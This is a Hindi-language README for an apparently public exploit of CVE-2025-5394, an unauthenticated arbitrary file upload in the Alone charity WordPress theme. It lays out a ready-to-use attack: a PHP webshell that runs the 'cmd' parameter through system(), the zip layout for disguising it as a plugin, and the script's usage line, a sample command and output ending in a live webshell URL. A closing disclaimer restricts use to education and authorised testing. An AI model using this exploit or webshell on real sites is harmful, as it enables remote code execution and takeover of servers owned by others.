
Alone – चैरिटी बहुउद्देशीय गैर-लाभकारी वर्डप्रेस थीम <= 7.8.3 - प्लगइन इंस्टॉलेशन के माध्यम से बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड करने हेतु प्राधिकरण की कमी
Alone – Charity Multipurpose Non-profit WordPress थीम
संस्करण: <= 7.8.3
CVE: CVE-2025-5394
CVSS स्कोर: 9.8 (गंभीर)
WordPress के लिए Alone थीम alone_import_pack_install_plugin() फ़ंक्शन पर क्षमता जांच की कमी के कारण मनमाने फ़ाइल अपलोड के प्रति संवेदनशील है।
यह दोष बिना प्रमाणीकरण वाले हमलावरों को दूरस्थ स्थानों से ZIP फ़ाइलें (प्लगइन के रूप में प्रच्छन्न) अपलोड करने की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन प्राप्त किया जा सकता है।
इस रिपॉज़िटरी में एक Python स्क्रिप्ट है जो CVE-2025-5394 के शोषण को स्वचालित करती है।
स्क्रिप्ट संवेदनशील AJAX एक्शन को ट्रिगर करती है और एक नकली प्लगइन (वेबशेल युक्त) को सीधे WordPress सर्वर पर अपलोड करती है।
अपलोड की गई ZIP फ़ाइल की संरचना इस प्रकार होनी चाहिए:
shell_plugin.zip
└── shell_plugin
└── shell_plugin.php
जहाँ:
shell_plugin प्लगइन निर्देशिका है।shell_plugin.php प्लगइन हेडर के साथ एक मान्य PHP प्लगइन फ़ाइल है।shell_plugin.php के अंदर न्यूनतम प्लगइन हेडर का उदाहरण:
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
python3 CVE-2025-5394.py -help
usage: CVE-2025-5394.py [-h] -u URL -s SHELL
CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-s, --shell SHELL ZIP file URL containing webshell (.zip)
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
यह स्क्रिप्ट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान की गई है।
लेखक इस कोड के उपयोग से की गई किसी भी दुरुपयोग या अवैध गतिविधि के लिए जिम्मेदार नहीं है।
इसे केवल उन सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited